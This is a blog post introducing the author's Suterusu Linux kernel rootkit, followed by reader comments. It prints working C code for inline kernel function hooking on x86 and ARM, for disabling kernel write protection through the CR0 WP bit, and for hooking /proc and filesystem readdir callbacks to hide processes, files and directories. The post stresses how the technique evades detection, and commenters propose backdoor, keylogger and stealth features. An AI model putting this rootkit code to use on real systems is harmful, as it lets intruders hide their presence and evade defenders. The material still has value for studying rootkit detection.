Suterusu Rootkit: Inline Kernel Function Hooking on x86 and ARM

Introduction

A number of months ago, I added a new project to GitHub showcasing some code I worked on over the summer (https://github.com/mncoppola/suterusu).

Through my various router persistence and kernel exploitation adventures, I’ve taken a recent interest in Linux kernel rootkits and what makes them tick.  I did some searching around mainly in the packetstorm.org archive and whatever blogs turned up, but to my surprise there really wasn’t much to be found in the realm of modern public Linux rootkits.  The most prominent results centered around adore-ng, which hasn’t been updated since 2007 (at least, from the looks of it), and a few miscellaneous names like suckit, kbeast, and Phalanx.  A lot changes in the kernel from year to year, and I was hoping for something a little more recent.

So, like most of my projects, I said “screw it” and opened vim.  I’ll write my own rootkit designed to work on modern systems and architectures, and I’ll learn how they work through the act of doing it myself.  I’d like to (formally) introduce you to Suterusu, my personal kernel rootkit project targeting Linux 2.6 and 3.x on x86 and ARM.

There’s a lot to talk about in the way of techniques, design, and implementation, but I’ll start out with some of the basics.  Suterusu currently sports a large array of features, with many more in staging, but it may be more appropriate to devote separate blog posts to these.

Function Hooking in Suterusu

Most rootkits traditionally perform system call hooking by swapping out function pointers in the system call table, but this technique is well known and trivially detectable by intelligent rootkit detectors.  Instead of pursuing this route, Suterusu utilizes a different technique and performs hooking by modifying the prologue of the target function to transfer execution to the replacement routine.  This can be observed by examining the following four functions:

  • hijack_start()
  • hijack_pause()
  • hijack_resume()
  • hijack_stop()

These functions track hooks through a linked list of sym_hook structs, defined as:

struct sym_hook {
    void *addr;
    unsigned char o_code[HIJACK_SIZE];
    unsigned char n_code[HIJACK_SIZE];
    struct list_head list;
};

LIST_HEAD(hooked_syms);

To fully understand the hooking process, let’s step through some code.

Function Hooking on x86

Most of the weight is carried by the hijack_start() function, which takes as arguments pointers to the target routine and the “hook-with” routine:

void hijack_start ( void *target, void *new )
{
    struct sym_hook *sa;
    unsigned char o_code[HIJACK_SIZE], n_code[HIJACK_SIZE];
    unsigned long o_cr0;

    // push $addr; ret
    memcpy(n_code, "\x68\x00\x00\x00\x00\xc3", HIJACK_SIZE);
    *(unsigned long *)&n_code[1] = (unsigned long)new;

    memcpy(o_code, target, HIJACK_SIZE);

    o_cr0 = disable_wp();
    memcpy(target, n_code, HIJACK_SIZE);
    restore_wp(o_cr0);

    sa = kmalloc(sizeof(*sa), GFP_KERNEL);
    if ( ! sa )
        return;

    sa->addr = target;
    memcpy(sa->o_code, o_code, HIJACK_SIZE);
    memcpy(sa->n_code, n_code, HIJACK_SIZE);

    list_add(&sa->list, &hooked_syms);
}

A small shellcode buffer is initialized with a “push dword 0; ret” sequence, and the pushed value is then patched with the address of the hook-with function.  HIJACK_SIZE bytes (the size of the shellcode) are copied from the start of the target function so that they can be restored later, and the prologue is then overwritten with the patched shellcode.  From this point on, every call to the target function is redirected to the hook-with function.

The final step is to store the target function pointer, original code, and hook code to the linked list of hooks, thus completing the operation.  The remaining hijack functions operate on this linked list.
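
To make the byte layout of that stub concrete, here is a small userland sketch (not code from Suterusu) that builds the same six bytes.  The names build_push_ret and STUB_SIZE are made up for illustration, and the sketch assumes a 32-bit target, since a "push imm32" can only carry a 32-bit address:

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define STUB_SIZE 6  /* 1-byte push opcode + 4-byte immediate + 1-byte ret */

/* Fill out[] with "push imm32; ret", where imm32 is the hook address.
 * The immediate is written byte by byte in little-endian order, which is
 * what x86 expects regardless of the machine running this sketch. */
void build_push_ret(unsigned char out[STUB_SIZE], uint32_t hook_addr)
{
    assert(out != NULL);

    out[0] = 0x68;                              /* push imm32 */
    out[1] = (unsigned char)(hook_addr);
    out[2] = (unsigned char)(hook_addr >> 8);
    out[3] = (unsigned char)(hook_addr >> 16);
    out[4] = (unsigned char)(hook_addr >> 24);
    out[5] = 0xc3;                              /* ret */
}
```

When the CPU runs these bytes, the push places the hook address on the stack and the ret immediately pops it into the instruction pointer, so no register is clobbered on the way into the hook.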

hijack_pause() uninstalls the desired hook temporarily:

void hijack_pause ( void *target )
{
    struct sym_hook *sa;

    list_for_each_entry ( sa, &hooked_syms, list )
        if ( target == sa->addr )
        {
            unsigned long o_cr0 = disable_wp();
            memcpy(target, sa->o_code, HIJACK_SIZE);
            restore_wp(o_cr0);
        }
}

hijack_resume() reinstalls the hook:

void hijack_resume ( void *target )
{
    struct sym_hook *sa;

    list_for_each_entry ( sa, &hooked_syms, list )
        if ( target == sa->addr )
        {
            unsigned long o_cr0 = disable_wp();
            memcpy(target, sa->n_code, HIJACK_SIZE);
            restore_wp(o_cr0);
        }
}

hijack_stop() uninstalls the hook and deletes it from the linked list:

void hijack_stop ( void *target )
{
    struct sym_hook *sa;

    list_for_each_entry ( sa, &hooked_syms, list )
        if ( target == sa->addr )
        {
            unsigned long o_cr0 = disable_wp();
            memcpy(target, sa->o_code, HIJACK_SIZE);
            restore_wp(o_cr0);

            list_del(&sa->list);
            kfree(sa);
            break;
        }
}
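
The start/pause/resume/stop lifecycle can be tried out safely in userland by treating a plain byte array as the "function" being patched.  The sketch below is only a model under that assumption: the model_* names and the hand-rolled singly linked list are mine, not Suterusu's, and nothing here touches executable memory.  One deliberate difference from the kernel code above is that the bookkeeping node is allocated before the target is patched, so an allocation failure leaves the target untouched rather than hooked but untracked:

```c
#include <assert.h>
#include <stdlib.h>
#include <string.h>

#define HIJACK_SIZE 6

struct hook {
    unsigned char *addr;                  /* start of the patched region  */
    unsigned char o_code[HIJACK_SIZE];    /* original bytes               */
    unsigned char n_code[HIJACK_SIZE];    /* stub bytes                   */
    struct hook *next;
};

static struct hook *hooks;                /* head of the hook list */

static struct hook *find_hook(const unsigned char *target)
{
    struct hook *h;
    for (h = hooks; h; h = h->next)
        if (h->addr == target)
            return h;
    return NULL;
}

/* Save the original bytes, write the stub, and remember both. */
int model_start(unsigned char *target, const unsigned char *stub)
{
    struct hook *h;

    assert(target != NULL && stub != NULL);
    h = malloc(sizeof(*h));
    if (!h)
        return -1;                        /* nothing has been patched yet */

    h->addr = target;
    memcpy(h->o_code, target, HIJACK_SIZE);
    memcpy(h->n_code, stub, HIJACK_SIZE);
    memcpy(target, stub, HIJACK_SIZE);
    h->next = hooks;
    hooks = h;
    return 0;
}

/* Temporarily put the original bytes back. */
void model_pause(unsigned char *target)
{
    struct hook *h = find_hook(target);
    if (h)
        memcpy(target, h->o_code, HIJACK_SIZE);
}

/* Write the stub again. */
void model_resume(unsigned char *target)
{
    struct hook *h = find_hook(target);
    if (h)
        memcpy(target, h->n_code, HIJACK_SIZE);
}

/* Restore the original bytes and forget the hook. */
void model_stop(unsigned char *target)
{
    struct hook **pp;
    for (pp = &hooks; *pp; pp = &(*pp)->next) {
        if ((*pp)->addr == target) {
            struct hook *h = *pp;
            memcpy(target, h->o_code, HIJACK_SIZE);
            *pp = h->next;
            free(h);
            return;
        }
    }
}

int model_count(void)
{
    int n = 0;
    struct hook *h;
    for (h = hooks; h; h = h->next)
        n++;
    return n;
}
```

Calling model_start() on a buffer, then model_pause(), model_resume(), and model_stop() in turn should flip the first HIJACK_SIZE bytes between the stub and the original contents while leaving everything after them alone.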

Write Protection on x86

Since kernel text pages are marked read-only, attempting to overwrite a function prologue in this region of memory will produce a kernel oops.  This protection can be trivially circumvented, however, by clearing the WP bit (bit 16) of the cr0 register, which disables write protection for code running in kernel mode.  Wikipedia’s article on control registers confirms this property:

BIT   NAME   FULL NAME       DESCRIPTION
16    WP     Write protect   Determines whether the CPU can write to pages marked read-only

The WP bit will need to be set and reset at multiple points in the code, so it makes programmatic sense to abstract the operations.  The following code originates from the PaX project, specifically from the native_pax_open_kernel() and native_pax_close_kernel() routines. Extra caution is taken to prevent a potential race condition caused by unlucky scheduling on SMP systems, as explained in a blog post by Dan Rosenberg:

inline unsigned long disable_wp ( void )
{
    unsigned long cr0;

    preempt_disable();
    barrier();

    cr0 = read_cr0();
    write_cr0(cr0 & ~X86_CR0_WP);
    return cr0;
}

inline void restore_wp ( unsigned long cr0 )
{
    write_cr0(cr0);

    barrier();
    preempt_enable_no_resched();
}
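
The bit arithmetic behind these two helpers is easy to check in userland.  In the sketch below, fake_cr0 is an ordinary variable standing in for the real register (reading or writing cr0 itself requires kernel mode), and all names are hypothetical.  The example value 0x80050033 has PE, MP, ET, NE, WP, AM, and PG set:

```c
#include <assert.h>

#define CR0_WP_BIT   16
#define CR0_WP_MASK  (1UL << CR0_WP_BIT)   /* same bit the kernel names X86_CR0_WP */

/* Stand-in for the real control register; purely illustrative. */
static unsigned long fake_cr0 = 0x80050033UL;

int cr0_wp_enabled(unsigned long cr0)
{
    return (cr0 & CR0_WP_MASK) != 0;
}

/* Return cr0 with only the WP bit cleared; every other bit is preserved. */
unsigned long cr0_clear_wp(unsigned long cr0)
{
    unsigned long result = cr0 & ~CR0_WP_MASK;
    assert(!cr0_wp_enabled(result));
    return result;
}

/* Mirror of disable_wp(): clear WP and hand back the previous value. */
unsigned long model_disable_wp(void)
{
    unsigned long old = fake_cr0;
    fake_cr0 = cr0_clear_wp(old);
    return old;
}

/* Mirror of restore_wp(): write back exactly what was saved. */
void model_restore_wp(unsigned long old)
{
    fake_cr0 = old;
}
```

Restoring the saved value, rather than unconditionally setting WP again, means the register ends up in whatever state it was in before the call, even if WP had already been cleared by someone else.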

Function Hooking on ARM

A number of significant changes exist in the hijack_* set of hooking routines depending on whether the code is compiled for x86 or ARM.  For instance, the concept of a WP bit does not exist on ARM while special care must be taken to handle data and instruction caching introduced by the architecture.  While the concepts of data and instruction caching do exist on the x86 and x86_64 architectures, such features did not pose an obstacle during development.

The ARM-specific version of hijack_start() is modified to account for these architectural characteristics:

void hijack_start ( void *target, void *new )
{
    struct sym_hook *sa;
    unsigned char o_code[HIJACK_SIZE], n_code[HIJACK_SIZE];

    if ( (unsigned long)target % 4 == 0 )
    {
        // ldr pc, [pc, #0]; .long addr; .long addr
        memcpy(n_code, "\x00\xf0\x9f\xe5\x00\x00\x00\x00\x00\x00\x00\x00", HIJACK_SIZE);
        *(unsigned long *)&n_code[4] = (unsigned long)new;
        *(unsigned long *)&n_code[8] = (unsigned long)new;
    }
    else // Thumb
    {
        // add r0, pc, #4; ldr r0, [r0, #0]; mov pc, r0; mov pc, r0; .long addr
        memcpy(n_code, "\x01\xa0\x00\x68\x87\x46\x87\x46\x00\x00\x00\x00", HIJACK_SIZE);
        *(unsigned long *)&n_code[8] = (unsigned long)new;
        target--;
    }

    memcpy(o_code, target, HIJACK_SIZE);

    memcpy(target, n_code, HIJACK_SIZE);
    cacheflush(target, HIJACK_SIZE);

    sa = kmalloc(sizeof(*sa), GFP_KERNEL);
    if ( ! sa )
        return;

    sa->addr = target;
    memcpy(sa->o_code, o_code, HIJACK_SIZE);
    memcpy(sa->n_code, n_code, HIJACK_SIZE);

    list_add(&sa->list, &hooked_syms);
}

As displayed above, shellcodes for ARM and Thumb are included to redirect execution, similar to those on x86/_64.
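
Why the address lands at offset 8 in both stubs is worth spelling out.  In ARM state, reading pc yields the address of the current instruction plus 8, so "ldr pc, [pc, #0]" at offset 0 loads the word at offset 8 (the copy at offset 4 is never read).  In Thumb state, pc reads as the current instruction plus 4, so "add r0, pc, #4" at offset 0 also yields offset 8.  The userland sketch below rebuilds both stubs; build_arm_stub and put_le32 are hypothetical names, and the Thumb case assumes the function body itself starts on a 4-byte boundary, since the pc-relative add rounds pc down to a multiple of 4:

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

#define ARM_HIJACK_SIZE 12

/* Store a 32-bit value in little-endian byte order. */
static void put_le32(unsigned char *p, uint32_t v)
{
    p[0] = (unsigned char)(v);
    p[1] = (unsigned char)(v >> 8);
    p[2] = (unsigned char)(v >> 16);
    p[3] = (unsigned char)(v >> 24);
}

/* Build the redirect stub for `target` and return the address at which
 * the stub has to be written (the Thumb marker bit is stripped). */
uint32_t build_arm_stub(unsigned char out[ARM_HIJACK_SIZE],
                        uint32_t target, uint32_t hook)
{
    /* ldr pc, [pc, #0] */
    static const unsigned char arm_code[4] = { 0x00, 0xf0, 0x9f, 0xe5 };
    /* add r0, pc, #4; ldr r0, [r0, #0]; mov pc, r0; mov pc, r0 */
    static const unsigned char thumb_code[8] = {
        0x01, 0xa0, 0x00, 0x68, 0x87, 0x46, 0x87, 0x46
    };

    assert(out != NULL);

    if (target % 4 == 0) {              /* ARM state: word-aligned pointer */
        memcpy(out, arm_code, sizeof(arm_code));
        put_le32(out + 4, hook);        /* filler, skipped by the load */
        put_le32(out + 8, hook);        /* the word actually loaded    */
        return target;
    }

    /* Thumb state: function pointers carry the low bit as a marker. */
    memcpy(out, thumb_code, sizeof(thumb_code));
    put_le32(out + 8, hook);
    return target - 1;
}
```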

Instruction Caching on ARM

Most Android devices do not enforce read-only kernel page permissions, so at least for now we can forgo any potential voodoo magic to write to protected memory regions.  It is still necessary, however, to consider the concept of instruction caching on ARM when performing a function hook.

ARM CPUs utilize a data cache and instruction cache for performance benefits.  However, modifying code in-place may cause the instruction cache to become incoherent with the actual instructions in memory.  According to the official ARM technical reference, this issue becomes readily apparent when developing self-modifying code.  The solution is to simply flush the instruction cache whenever a modification to kernel text is made, which is accomplished by a call to the kernel routine flush_icache_range():

void cacheflush ( void *begin, unsigned long size )
{
    flush_icache_range((unsigned long)begin, (unsigned long)begin + size);
}
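
For the userland port mentioned later in this post, flush_icache_range() is not available.  A rough equivalent, assuming a GCC or Clang toolchain, is the compiler builtin __builtin___clear_cache(), which takes the start and end of the modified range.  The wrapper name patch_and_flush is hypothetical, and in this sketch the destination is an ordinary data buffer rather than real code:

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Copy `size` bytes of new code over `dst`, then ask the compiler runtime
 * to make the instruction cache coherent for that range.  On x86 the
 * builtin typically compiles to nothing; on ARM it performs the flush. */
void patch_and_flush(unsigned char *dst, const unsigned char *src, size_t size)
{
    assert(dst != NULL && src != NULL);

    memcpy(dst, src, size);
    __builtin___clear_cache((char *)dst, (char *)dst + size);
}
```

The important part is the ordering: the flush has to come after the write, otherwise the CPU may keep executing stale instructions fetched before the patch.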

Pros and Cons of Inline Hooking

As with most techniques, inline function hooking presents various benefits and detriments when compared to simply hijacking the system call table:

Pro: Any function may be hijacked, not just system calls.

Pro: Less commonly implemented in rootkits, so it is less likely to be detected by rootkit detectors.  It is also easy to circumvent simple hook detection engines due to the flexibility of assembly languages.  A variety of detection evasion techniques for x86 may be found in the article x86 API Hooking Demystified.

Pro: Inline function hooking may be applied to userland with minimal/no modification.  While working on the Android port of DMTCP, an application checkpointing tool out of Northeastern’s HPC lab, it was possible to simply copy and paste the entirety of the hijack_* routines, modified only to use userland linked lists.

Con: The current hooking implementation is not thread-safe.  By temporarily unhooking a function via hijack_pause(), a race window is opened for other threads to execute the unhooked function before hijack_resume() is called.  Potential solutions include crafty use of locking and permanently hijacking the target function and inserting extra logic within the hook-with routine.  However, with the latter option, special care must be taken when executing the original function prologue on architectures characterized by variable-length instructions (x86/_64) and PC/IP-relative addressing (x86_64 and ARM).

Con: Another harmful possibility in the current implementation is hook recursion.  More an issue of poor implementation than any insurmountable design flaw, there are various easy solutions to the problem of having your hook-with function accidentally call the hooked function itself, leading to infinite recursion.  Great information on the topic and proof of concept code can (once again) be found in the article x86 API Hooking Demystified.
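
One of the simpler ways to defuse hook recursion is a re-entrancy flag.  The userland sketch below is not taken from Suterusu: the "hook" is modeled as a function pointer swap instead of an inline patch, every name is hypothetical, and the per-thread flag relies on C11 _Thread_local (kernel code would need some per-task equivalent):

```c
#include <assert.h>

static _Thread_local int in_hook;    /* set while this thread is inside the hook */
static int hook_calls;               /* how many times the hook body really ran  */

int original_op(int x)
{
    return x + 1;
}

/* Callers reach the operation through this pointer; swapping it stands in
 * for overwriting the function prologue. */
int (*op)(int) = original_op;

/* Some helper the hook relies on, which itself calls the hooked operation. */
int helper_that_uses_op(int x)
{
    return op(x) * 2;
}

int hooked_op(int x)
{
    int ret;

    if (in_hook)                     /* re-entered from inside the hook:   */
        return original_op(x);       /* behave like the unhooked function  */

    in_hook = 1;
    hook_calls++;
    ret = helper_that_uses_op(x);    /* would recurse forever without the guard */
    in_hook = 0;
    return ret;
}

void install_hook(void)
{
    assert(op == original_op);       /* refuse to install twice */
    op = hooked_op;
}
```

After install_hook(), a call such as op(3) enters the hook once, the nested call made by the helper falls through to original_op(), and the flag is clear again on return.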

Hiding Processes, Files, and Directories

Once a reliable hooking “framework” is implemented, it’s fairly trivial to start intercepting interesting functions and doing interesting things. One of the most basic things a rootkit must do is hide processes and filesystem objects, both of which may be accomplished with the same basic technique.

In the Linux kernel, one or more instances of the file_operations struct are associated with each supported filesystem (usually one instance for files and one for directories, but dig into the kernel source code and you’ll find that filesystems are a certain kind of special). These structs contain pointers to the routines associated with different file operations, for instance reading, writing, mmap’ing, modifying permissions, etc. For explicatory purposes, we will examine the instantiation of the file_operations struct on ext3 for directory objects:

const struct file_operations ext3_dir_operations = {
    .llseek     = generic_file_llseek,
    .read       = generic_read_dir,
    .readdir    = ext3_readdir,
    .unlocked_ioctl = ext3_ioctl,
#ifdef CONFIG_COMPAT
    .compat_ioctl   = ext3_compat_ioctl,
#endif
    .fsync      = ext3_sync_file,
    .release    = ext3_release_dir,
};

To hide an object on the filesystem, it is possible to simply hook the readdir function and filter out any undesired items from its output.  To maintain a level of system agnosticism, Suterusu dynamically obtains the pointer to a filesystem’s active readdir routine by navigating the target object’s file struct:

void *get_vfs_readdir ( const char *path )
{
    void *ret;
    struct file *filep;

    filep = filp_open(path, O_RDONLY, 0);
    if ( IS_ERR(filep) )    // filp_open() reports failure via ERR_PTR(), never NULL
        return NULL;

    ret = filep->f_op->readdir;

    filp_close(filep, 0);

    return ret;
}

The actual hook process (for hiding items in /proc) looks like:

#if LINUX_VERSION_CODE > KERNEL_VERSION(2, 6, 30)
proc_readdir = get_vfs_readdir("/proc");
#endif
hijack_start(proc_readdir, &n_proc_readdir);

The kernel version check is in response to a change implemented in version 2.6.31 that removes the exported proc_readdir() symbol from include/linux/proc_fs.h. In previous versions it was possible to simply retrieve the pointer value externally upon linking, but rootkit developers are now forced to obtain it by alternate, manual means.
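
The comparison works because KERNEL_VERSION() packs the three version components into a single integer as (major << 16) + (minor << 8) + patch, so ordinary integer comparison orders versions correctly.  The sketch below reproduces that packing in userland; PACK_VERSION and needs_runtime_lookup are hypothetical names, and the sketch assumes a patch level below 256:

```c
#include <assert.h>

/* Same packing scheme as the kernel's KERNEL_VERSION() macro. */
#define PACK_VERSION(a, b, c) (((a) << 16) + ((b) << 8) + (c))

/* Nonzero when the given version is newer than 2.6.30, i.e. 2.6.31 and up,
 * which is when the readdir pointer has to be looked up at runtime. */
int needs_runtime_lookup(int major, int minor, int patch)
{
    assert(patch >= 0 && patch < 256);
    return PACK_VERSION(major, minor, patch) > PACK_VERSION(2, 6, 30);
}
```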

To perform the actual hiding of objects in /proc, Suterusu hooks proc_readdir() with the following routine:

static int (*o_proc_filldir)(void *__buf, const char *name, int namelen, loff_t offset, u64 ino, unsigned d_type);

int n_proc_readdir ( struct file *file, void *dirent, filldir_t filldir )
{
    int ret;

    o_proc_filldir = filldir;

    hijack_pause(proc_readdir);
    ret = proc_readdir(file, dirent, &n_proc_filldir);
    hijack_resume(proc_readdir);

    return ret;
}

The real heavy lifting occurs in the filldir function, which serves as a callback executed for each item in the directory.  This is replaced with a malicious n_proc_filldir() function, as follows:

static int n_proc_filldir( void *__buf, const char *name, int namelen, loff_t offset, u64 ino, unsigned d_type )
{
    struct hidden_proc *hp;
    char *endp;
    long pid;

    pid = simple_strtol(name, &endp, 10);

    list_for_each_entry ( hp, &hidden_procs, list )
        if ( pid == hp->pid )
            return 0;

    return o_proc_filldir(__buf, name, namelen, offset, ino, d_type);
}

Since the intention is to hide processes by hijacking the readdir/filldir routines of /proc, Suterusu simply performs a match of the object name against a linked list of all PIDs the user wishes to hide.  If a match is found, the callback returns 0 and the item is hidden from the directory listing.  Otherwise, the original proc_filldir() function is executed and its value returned.
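
The callback-wrapping idea can be exercised in userland without any kernel involvement.  In the sketch below, list_entries() is a made-up stand-in for a readdir routine that invokes a callback once per name, and the hidden PID values are arbitrary examples.  Unlike the kernel code above, this version only treats a name as a PID when the whole string is numeric, which is my own tightening rather than Suterusu's behavior:

```c
#include <assert.h>
#include <stdlib.h>

typedef int (*emit_fn)(void *ctx, const char *name);

static const long hidden_pids[] = { 1337, 4242 };   /* example values only */
static emit_fn real_emit;    /* saved original callback, like o_proc_filldir */

/* Replacement callback: swallow hidden PIDs, forward everything else. */
int filtering_emit(void *ctx, const char *name)
{
    char *end;
    long pid = strtol(name, &end, 10);
    size_t i;

    assert(real_emit != NULL);

    if (end != name && *end == '\0')          /* entire name was a number */
        for (i = 0; i < sizeof(hidden_pids) / sizeof(hidden_pids[0]); i++)
            if (pid == hidden_pids[i])
                return 0;                     /* report success, emit nothing */

    return real_emit(ctx, name);
}

/* Stand-in for readdir: call `emit` for each name until one fails. */
int list_entries(const char *const *names, size_t n, emit_fn emit, void *ctx)
{
    size_t i;
    for (i = 0; i < n; i++) {
        int ret = emit(ctx, names[i]);
        if (ret)
            return ret;
    }
    return 0;
}

/* Stand-in for the hooked readdir: save the caller's callback and
 * substitute the filtering one. */
int list_filtered(const char *const *names, size_t n, emit_fn emit, void *ctx)
{
    real_emit = emit;
    return list_entries(names, n, filtering_emit, ctx);
}

/* Example consumer: counts the entries it is shown. */
int count_emit(void *ctx, const char *name)
{
    (void)name;
    ++*(int *)ctx;
    return 0;
}
```

Because the saved callback lives in a single global, two listings running at the same time would overwrite each other's pointer; the o_proc_filldir global in the kernel code shares that limitation.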

This same concept applies for hiding files and directories, except a direct string match against the object name is performed instead of converting the PID name to a number type first:

static int n_root_filldir( void *__buf, const char *name, int namelen, loff_t offset, u64 ino, unsigned d_type )
{
    struct hidden_file *hf;

    list_for_each_entry ( hf, &hidden_files, list )
        if ( ! strcmp(name, hf->name) )
            return 0;

    return o_root_filldir(__buf, name, namelen, offset, ino, d_type);
}

22 responses to “Suterusu Rootkit: Inline Kernel Function Hooking on x86 and ARM”

  1. Have you read the Ksplice paper at http://www.ksplice.com/doc/ksplice.pdf ? They use a similar technique of overwriting the function prologue with a jump. For thread safety, they scan the kernel stack of every process, inside stop_machine(), and abort if one of the to-be-patched functions is active.

    They also have a clever technique for patching non-exported (i.e. static) functions and data. A patch ships with a copy of the old code that should already be running, in a format with relocation records still present. The process of applying an update matches this up with the running code in memory, and reverses the work that was performed by the kernel’s dynamic linker in applying those relocations. This gives you the addresses of some static functions, which in turn can be matched, and the fixed point gives you addresses of nearly every function in the kernel.

    (The matching process also means that Ksplice is great at detecting rootkits that have already scribbled over kernel code.)

    Anyway, read the paper if you haven’t already, it’s really cool stuff and would make a good basis for a sophisticated rootkit.

    1. Thanks for the pointer, I haven’t read the Ksplice paper yet but definitely will now. Sounds like there’s a lot of interesting stuff to draw inspiration from; hopefully I can implement some of the ideas in an upcoming commit.

  2. Did you consider using kernel probes? This debug subsystem is active by default on most linux distributions (debian, redhat, etc) and also on android devices! Take a look at my article http://www.libcrack.so/2012/09/02/bypassing-devmem_is_allowed-with-kprobes/
    The good point is you don’t need to worry about the hardware arch, the bad point is that you need to apply kung-foo to hide the module from the modules linked list.

    Cheers!

    Borja.

    1. I actually have considered it, but unfortunately it seems that Android isn’t compiled with Kprobes support by default (which opposes what your blog post says ;) ). I’ll show you:

      Android kernels are certainly compiled with CONFIG_HAVE_KPROBES, however a quick grep of a source tree shows very few instances of this flag, none of which are #ifdef’s:

      $ grep CONFIG_HAVE_KPROBES -r .
      ./include/config/auto.conf:CONFIG_HAVE_KPROBES=y
      ./include/generated/autoconf.h:#define CONFIG_HAVE_KPROBES 1
      ./.config:CONFIG_HAVE_KPROBES=y
      ./.config.old:CONFIG_HAVE_KPROBES=y
      ./arch/um/defconfig:# CONFIG_HAVE_KPROBES is not set
      ./arch/arm/configs/android_4430_defconfig:CONFIG_HAVE_KPROBES=y

      I’m actually not even sure what function this flag serves, and documentation seems to have no explanation for it.

      However, if you take a look at the tree’s .config file, there is actually a second flag CONFIG_KPROBES that is not set. This is the flag that actually enables support for Kprobes:

      $ grep CONFIG_KPROBES -r .
      ./drivers/misc/lkdtm.c:#ifdef CONFIG_KPROBES
      ./include/linux/kprobes.h:#ifdef CONFIG_KPROBES
      ./include/linux/kprobes.h:#else /* CONFIG_KPROBES */
      ./include/linux/kprobes.h:#endif /* CONFIG_KPROBES */
      ./include/linux/kprobes.h:#ifdef CONFIG_KPROBES
      ./include/linux/kprobes.h:#ifdef CONFIG_KPROBES_SANITY_TEST
      ./include/linux/kprobes.h:#endif /* CONFIG_KPROBES_SANITY_TEST */
      ./include/linux/kprobes.h:#else /* !CONFIG_KPROBES: */
      ./include/linux/kprobes.h:#endif /* CONFIG_KPROBES */
      ./.config:# CONFIG_KPROBES is not set
      ./kernel/Makefile:obj-$(CONFIG_KPROBES_SANITY_TEST) += test_kprobes.o
      ./kernel/Makefile:obj-$(CONFIG_KPROBES) += kprobes.o
      ... (another 60 lines or so)

  3. Hi,

    This rootkit looks interesting and I like your design ideas including support for both
    2.6.x and 3.x kernels and nice socket hiding features.

    A few feature ideas: (if you like them).
    -Autostart on boot
    -Remote shell backdoor (with encryption and TTY/PTY support)
    -Keylogger/TTY Sniffer logs sniffed data to hidden logfile
    -Option to hide network interface’s promiscuous mode
    -Install script

    1. I’ll consider it, thanks.

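  4. […]         There are several ways to hook here. Michael Coppola’s recent article discusses “Inline Kernel Function Hooking”. To me, that article is a classic treatment of hooking system calls. The figure below shows a very typical system call hook. […]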

  5. There might be a more severe thread safety problem: during hijack_pause() and hijack_resume() some other function might try to execute the hooked function in the middle of memcpy(), which could result in a panic (e.g. we copied only 6 bytes out of 12 and exactly at that moment someone calls our hooked function). For some reason it doesn’t happen on Linux, but I tried a similar approach on OS X and got regular panics. Any ideas why?

    1. I’m not sure the reason why the race is only producible on OS X, but it sounds like the result of some really unlucky scheduling or SMP execution. I’m hoping to fix this soon and am currently looking into different options. Suggestions are welcome.

      1. Trampolines as described here http://jbremer.org/x86-api-hooking-demystified/#ah-trampoline should fix this race. Basically it could be like this: 1) Permanently overwrite prologue of hooked function with jump to hijack function. 2) Inside hijack function call trampoline, which first has to execute overwritten original bytes and then jump to the original hooked function right after those bytes. I’m no good at assembly, but the problem here is that overwritten memory must *not* end in the middle of instruction and instruction length at the prologue might depend on the hooked function. This is in turn solvable by integrating disassembler into the rootkit (I’ve seen dtrace used that way) or hand-picking target function. Please take it with a grain of salt, I’m not sure myself that what I’m saying is technically correct.
        Also, one of the reasons there’s no race condition on Linux (at least not yet) is that hooked functions might be already protected by mutex of some sort.

  6. […] Hijacking a kernel function seems to involve some shellcode… and it is platform-specific, so it still needs further study. (Worth a look in passing.) […]

  7. You’re still theoretically unsafe on x86 on SMP, because only one-byte changes are safe from prefetching. Changes that involve more than a single byte require (as INTEL states for self-modifying code) that you stop CPUs, do the change, restart. Granted, in the very vast majority of cases you don’t need this, most likely because nobody is executing the target code ;-)

    Also, I would limit as much as possible .text hijacking. It’s somehow common practice today to check the integrity of the .text segment. Adore was using file/network operations extensively, so people started to check them as well. One step further, you can take the file/network operation pointer that is associated to any object in the kernel (e.g. a dentry) and go down changing -that- pointer, rather than the global file operation struct. You can do this for your hidden directory and similar. I’m not sure why this is not in any public rootkit I know of – it’s fairly straightforward code (it might have other drawbacks, e.g. someone knowing that you use it, might start looping through all the allocated dentry or file entry looking for a mismatching pointer and would immediately locate your hidden code… but that’s true in general for any rootkit, once you know what you’re looking for). The pro of function pointer interposition is that you don’t need to stop CPUs or mess with the .text :-)

    Also, if you need a continuously running task, rather than spawning a kthread and then having to hide it, you may consider using position-independent code (a blob) and register a timer that continuously relocates it and executes. A long time ago sgrakkyu wrote a paper about that called “Dynamic Kernel Infection”, was in Italian and perhaps translated in BFi. I don’t seem to be able to reach it right now, though. But the main idea is the one described above, this is just to give credit :-)

  8. Although probably not directly relevant to your Linux rootkit investigations, one point of interest regarding the Windows system libraries and kernel is that every function has a single-cycle two byte NOP at the start of its prologue that allows hijacking (or “hot-patching”) without the race condition: http://blogs.msdn.com/b/oldnewthing/archive/2011/09/21/10214405.aspx

  9. […] of the project says “An LKM rootkit targeting Linux 2.6/3.x on x86(_64), and ARM”. Another article related to Suterusu was published in January […]

  10. […] of the project says: “An LKM rootkit for Linux 2.6/3.x on x86(_64) and ARM”. Another article related to Suterusu was published in January 2013 […]

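  11. […] Judging from the trojan’s name, its author was very likely inspired by the open-source project Suterusu (https://github.com/mncoppola/suterusu) and also borrowed some of that project’s code (the process injection part). The project’s description reads: an LKM rootkit targeting Linux 2.6/3.x on x86(_64), and ARM. An analysis of the project can be found here: https://poppopret.org/2013/01/07/suterusu-rootkit-inline-kernel-function-hooking-on-x86-and-arm/ […]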

  12. […] of the project says: “An LKM rootkit for Linux 2.6/3.x on x86(_64) and ARM”. Another article related to Suterusu was published in January 2013 […]

  13. […] Suterusu Rootkit: Inline Kernel Function Hooking on x86 and ARM […]